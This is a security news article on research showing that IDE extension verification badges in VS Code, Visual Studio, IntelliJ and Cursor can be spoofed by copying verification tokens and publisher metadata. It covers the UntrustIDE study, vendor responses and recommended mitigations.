Misplaced Trust and IDE Verification Badges

Security researchers conducted an in-depth investigation during May and June 2025 into how major IDEs handle extension verification. The study focused on Visual Studio Code, Visual Studio, IntelliJ IDEA, and Cursor. Their findings revealed that verification badges should not be trusted and this was a systemic problem. Malicious extensions that retain the “verified” badge and appear trustworthy, even while executing unauthorized OS‑level commands.

Verification Systems Bypassed

Their method began by analyzing how IDEs verify extension publisher and identity information. Researchers observed that IDE clients send specific requests to marketplace servers, and the resulting verification tokens are stored inside the extension package.

By reverse‑engineering this mechanism, attackers can craft a malicious VSIX or plugin that carries the same verification token, publisher ID, and extension metadata as a legitimate verified extension. This spoofed package levers the badge while embedding harmful functionality—such as shell commands or backdoor triggers—without altering its outward appearance.

Notably, even after notifying Microsoft, JetBrains, and Cursor, security researchers found the exploit remained effective as late as June 29, 2025. Microsoft reportedly classified the risk “by design,” asserting that the vulnerability did not meet its criteria for immediate remediation. Software developers saying something is a feature rather than a bug is meme worthy, but when that “feature” allows for supply chain attacks, perhaps a new excuse needs to be used, or the vulnerabilities patched.

Real‑World Risks to Developer Workstations and Supply Chains

Because IDE extensions run with the same privileges as the user—often with full access to files, network, and shell, the implications are severe:

  • Extensions can read or modify source code, deployment credentials, SSH keys, or environment configurations.
  • They can exfiltrate data silently or silently instantiate backdoors.
  • Poisoned extensions may infect internal code repositories, compounding supply chain damage.

Developers frequently trust the “verified” badge as a cue of safety, yet it has been demonstrated that badge use as an indicator of reliability is compromised. This vulnerability is especially concerning for developers within high‑risk or regulated environments, where unchecked extensions can circumvent strict security policies and enable lateral movement.

Extension Integrity has Been Questioned in the Past

The exploitation is not limited to verification spoofing. Academic research such as the UntrustIDE study. Among 25,000+ extensions analyzed in early 2023, 21 had confirmed proof‑of‑concept code injection vulnerabilities, impacting over six million installations. Many extensions imported third-party dependencies and lacked sufficient validation of manifest settings, workspace configuration, or network content.

UntrustIDE research mapped four possible taint sources: workspace settings, project files, network responses, and external configurations. Further, three dangerous sinks: shell commands, eval(), and arbitrary file writes. The lack of sandboxing in VSCode and similar IDEs magnifies this threat significantly.

Mitigation Strategies and Security Best Practice

Several mitigation strategies and best practices have been issued:

  1. Do not rely solely on verification badges as indicators of trust.
  2. Embed cryptographic per-file hashes and publisher certificates directly in extension packages, not just metadata fields.
  3. Use signed manifests and enforce signature checks at install and runtime even for local sideloaded extensions.
  4. Adopt multifactor extension signing and verification processes that resist token spoofing.
  5. Implement DevSecOps pipelines that vet third‑party extensions, include static and dynamic analysis, and monitor anomalous behavior at runtime.

From an organizational perspective, it is advised:

  • Restrict extension installation to curated internal sources.
  • Block sideloading by default or enforce override controls.
  • Vet all extensions via static analysis tools such as CodeQL that target extension-specific taint paths.
  • Conduct runtime monitoring to detect unusual OS calls or network activity originating from IDEs.

For those securing development environments, the key takeaway is clear: badges alone offer false assurance. Threat actors can mimic publisher identity and badge metadata while executing malicious payloads.

Teams should audit any use of trusted extensions, especially those installed outside official marketplaces. They must enforce technical controls to ensure all installed packages, whether from marketplace or sideloaded, are truly verified, not simply visually labeled.

As part of broader software supply chain assurance, verifying extension integrity, even for developer tools, is non-negotiable. Attackers can exploit trusted workflows, seed compromised code through developer workstations, and penetrate deeper than a typical phishing attack could.

Underwhelming
 Vendor Reactions

Despite the attention, responses from IDE vendors have lacked urgency and have been underwhelming:

  • Microsoft asserted that default signature verification prevents marketplace publishing of spoofed extensions—but acknowledged sideloading remains vulnerable. They insisted changes are not critical.
  • JetBrains treated sideloaded IntelliJ plugins as explicitly flagged third‑party extensions, thus relying on UI warnings rather than eliminating the flaw.
  • Cursor reportedly does not enforce any signature verification at all, leaving the ecosystem open.

Their responses have been criticized from illustrating a gap between understanding the technical risk to the slow or non-existent enacting of security updates.

The Trust Gap Widened

Research from both security firms and academics reveals a critical trust gap in how modern IDE platforms verify extensions. Malicious actors can manipulate verified symbols and metadata to bypass trust controls and execute arbitrary code on developer machines. Vendor responses to date have been tepid, leaving the risk active as of late June 2025.

Security teams must respond proactively. They should embed cryptographic integrity checks, forbid sideloading by default, apply taint‑aware static analysis, and treat extension trust badges with skepticism. The developer environment is part of the attack surface, and protecting it demands rigor equal to the rest of the software supply chain.

Tags: No tags

Comments are closed.